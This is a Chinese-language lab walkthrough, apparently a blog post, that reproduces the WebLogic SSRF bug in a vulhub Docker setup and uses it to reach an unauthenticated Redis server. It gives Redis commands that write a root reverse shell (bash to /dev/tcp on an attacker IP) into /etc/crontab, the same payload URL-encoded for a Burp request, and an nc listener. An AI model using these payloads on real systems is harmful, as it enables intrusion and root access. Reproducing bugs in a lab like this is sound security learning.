redis数据库非授权访问-SSRF

文章目录

    • 第一步 :获取镜像
    • 第二步 启动docker镜像
    • 第三步:登录docker镜像
    • 第四步:访问weblogic(7001端口)
    • 第五步:存在SSRF 漏洞
        • 抓到的数据包
        • 进行内网的探测
        • 补充:redis 数据库
    • 第六步 通过读写计划任务文件crontab
        • 反弹Shell 到指定地址
        • url编码
        • burp里面提交
    • 第七步 第六步的同时设置监听

第一步 :获取镜像

[cd Desktop/]
[cd vulhub-master/]
[cd weblogic/ssrf]
[sudo docker-compose up -d]

redis数据库非授权访问-SSRF_第1张图片redis数据库非授权访问-SSRF_第2张图片

第二步 启动docker镜像

 [docker-compose up -d] 启动两个docker 镜像
 [sudo docker ps]

redis数据库非授权访问-SSRF_第3张图片redis数据库非授权访问-SSRF_第4张图片

第三步:登录docker镜像

[sudo docker exec -it " "/bin/bash"]

[uname -a] 查看当前系统的版本信息
[cd /etc] 进入/etc下
[ls -al crontab ]查看计划任务的权限

redis数据库非授权访问-SSRF_第5张图片redis数据库非授权访问-SSRF_第6张图片

[cat crontab ]
[cp crontab crontab.bak]
[ ls -lh cron*]

redis数据库非授权访问-SSRF_第7张图片

第四步:访问weblogic(7001端口)

 [http://ip:7001]
 [ http://10.0.105.202:7001]

redis数据库非授权访问-SSRF_第8张图片

第五步:存在SSRF 漏洞

[ http://10.0.105.202:7001/uddiexplorer/]

redis数据库非授权访问-SSRF_第9张图片redis数据库非授权访问-SSRF_第10张图片

抓到的数据包

redis数据库非授权访问-SSRF_第11张图片redis数据库非授权访问-SSRF_第12张图片

[提交不同的地址,回显不同]
redis数据库非授权访问-SSRF_第13张图片

进行内网的探测

[http:localhost:7001]
[http:localhost:]

redis数据库非授权访问-SSRF_第14张图片

[出现404错误]
redis数据库非授权访问-SSRF_第15张图片
[operator=http://10.0.105.202:6379]
redis数据库非授权访问-SSRF_第16张图片

补充:redis 数据库

 1.[未授权访问 在访问redis 数据库的时候,不需要提供 用户名和密码]
  2.[具有root 权限]
  3.[读写文件]

第六步 通过读写计划任务文件crontab

反弹Shell 到指定地址

定时计划任务命令:

-----------------------------------------
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/10.0.105.247/777 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
-----------------------------------------

url编码

-----------------------------------------
%73%65%74%20%31%20%22%5c%6e%5c%6e%5c%6e%5c%6e%2a%20%2a%20%2a%20%2a%20%2a%20%72%6f%6f%74%20%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%31%30%35%2e%32%34%37%2f%37%37%37%20%30%3e%26%31%5c%6e%5c%6e%5c%6e%5c%6e%22%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%69%72%20%2f%65%74%63%2f%0a%63%6f%6e%66%69%67%20%73%65%74%20%64%62%66%69%6c%65%6e%61%6d%65%20%63%72%6f%6e%74%61%62%0a%73%61%76%65
---------------------------------------------

burp里面提交

redis 数据库ip —10.0.105.202
kali的ip-----10.0105.247

----
http://10.0.105.202:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.105.247%2F777%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

第七步 第六步的同时设置监听

-----------------
nc -lvvp 777
----------------

你可能感兴趣的:(漏洞复现)